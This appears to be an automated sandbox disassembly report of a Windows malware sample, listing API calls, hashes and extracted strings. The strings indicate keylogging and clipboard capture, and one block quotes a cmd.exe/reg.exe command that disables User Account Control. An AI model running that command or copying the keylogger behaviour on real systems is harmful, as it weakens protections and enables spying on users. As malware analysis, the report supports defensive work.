                                                  • Opcode ID: 7b0447af1eef3aba55a8b785431e69fe107cf013706139a1f09030039ea2dbb0
                                                  • Instruction ID: 9135d8dbad86ad48596e871537d7b2906c3d36c2a7f97e2d86650b4d09e6d137
                                                  • Opcode Fuzzy Hash: 7b0447af1eef3aba55a8b785431e69fe107cf013706139a1f09030039ea2dbb0
                                                  • Instruction Fuzzy Hash: E341A0316082406AC324FB26D852AEF72A59FD1348F80883FF54A671D6EF7C5D49866E
                                                  APIs
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\1.exe,00000104), ref: 00443515
                                                  • _free.LIBCMT ref: 004435E0
                                                  • _free.LIBCMT ref: 004435EA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$FileModuleName
                                                  • String ID: (&O$C:\Users\user\Desktop\1.exe
                                                  • API String ID: 2506810119-3226332817
                                                  • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                  • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                  • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                  APIs
                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Init_thread_footer__onexit
                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$ mG$xdF
                                                  • API String ID: 1881088180-3895790603
                                                  • Opcode ID: f67973ec46b97c5c4aa65bfb5036d03e20d149532382fb37f8e1e700a9a6f435
                                                  • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                  • Opcode Fuzzy Hash: f67973ec46b97c5c4aa65bfb5036d03e20d149532382fb37f8e1e700a9a6f435
                                                  • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                  • wsprintfW.USER32 ref: 0040B22E
                                                    • Part of subcall function 0040A671: SetEvent.KERNEL32(00000000,?,00000000,0040B245,00000000), ref: 0040A69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EventLocalTimewsprintf
                                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                  • API String ID: 1497725170-248792730
                                                  • Opcode ID: 14b6403a7efe1e8dca35b9b55045b353a84799854715775b8db5cdf27f5a0034
                                                  • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                  • Opcode Fuzzy Hash: 14b6403a7efe1e8dca35b9b55045b353a84799854715775b8db5cdf27f5a0034
                                                  • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: H%P
                                                  • API String ID: 0-38831225
                                                  • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                                  • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                                  • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                  • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateHandleSizeSleep
                                                  • String ID: hQG
                                                  • API String ID: 1958988193-4070439852
                                                  • Opcode ID: c65f2f21741384324dcf83d119238179140777c831620f2138c2e1e787063c37
                                                  • Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
                                                  • Opcode Fuzzy Hash: c65f2f21741384324dcf83d119238179140777c831620f2138c2e1e787063c37
                                                  • Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F
                                                  APIs
                                                  • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                  • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                  • GetLastError.KERNEL32 ref: 0041D611
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ClassCreateErrorLastRegisterWindow
                                                  • String ID: 0$MsgWindowClass
                                                  • API String ID: 2877667751-2410386613
                                                  • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                  • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                  • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                  APIs
                                                  • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                  • CloseHandle.KERNEL32(?), ref: 004077E5
                                                  • CloseHandle.KERNEL32(?), ref: 004077EA
                                                  Strings
                                                  • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                  • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CloseHandle$CreateProcess
                                                  • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                  • API String ID: 2922976086-4183131282
                                                  • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                  • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                  • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002), ref: 004433FA
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044340D
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,00000000,?,0044332B,00000000,0046E958,0000000C,00443482,00000000,00000002), ref: 00443430
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                  • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                  • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474F08,00404E7A,00000001,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000), ref: 00405120
                                                  • SetEvent.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000), ref: 0040512C
                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000), ref: 00405137
                                                  • CloseHandle.KERNEL32(?,?,00000000,00474F08,00404CA8,00000000,00000000,00000000,00000000), ref: 00405140
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                  • String ID: KeepAlive | Disabled
                                                  • API String ID: 2993684571-305739064
                                                  • Opcode ID: e5f6bdedb76762309724806cefe57d6c38b8d0f17cb5b8ee228d9c7a8f63914c
                                                  • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                  • Opcode Fuzzy Hash: e5f6bdedb76762309724806cefe57d6c38b8d0f17cb5b8ee228d9c7a8f63914c
                                                  • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                  APIs
                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                  • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                  • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                  • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: PlaySound$HandleLocalModuleSleepTime
                                                  • String ID: Alarm triggered
                                                  • API String ID: 614609389-2816303416
                                                  • Opcode ID: 96b31a83c5708b157676ff123dbf5738d6bc944c16c6d3faf6528a9f050a26c2
                                                  • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                  • Opcode Fuzzy Hash: 96b31a83c5708b157676ff123dbf5738d6bc944c16c6d3faf6528a9f050a26c2
                                                  • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                  • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                  • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                  Strings
                                                  • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                  • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                  • API String ID: 3024135584-2418719853
                                                  • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                  • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                  • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                  • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                  • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                  • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                  APIs
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                  • _free.LIBCMT ref: 0044943D
                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                  • _free.LIBCMT ref: 00449609
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                  • String ID:
                                                  • API String ID: 1286116820-0
                                                  • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                  • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                  • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                  APIs
                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                    • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                    • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
                                                    • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475348), ref: 0041C096
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 2180151492-0
                                                  • Opcode ID: 22950637cb7b8fd59b250b55f92dfa02166358bf13c1a565a1d03cdc39943e0b
                                                  • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                                  • Opcode Fuzzy Hash: 22950637cb7b8fd59b250b55f92dfa02166358bf13c1a565a1d03cdc39943e0b
                                                  • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2022264708.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2022243593.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022299283.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022319772.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2022350656.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,?,00000001,0043F918,?), ref: 004511F9
                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043AF04,?), ref: 00451294
                                                  • __freea.LIBCMT ref: 0045129D
                                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
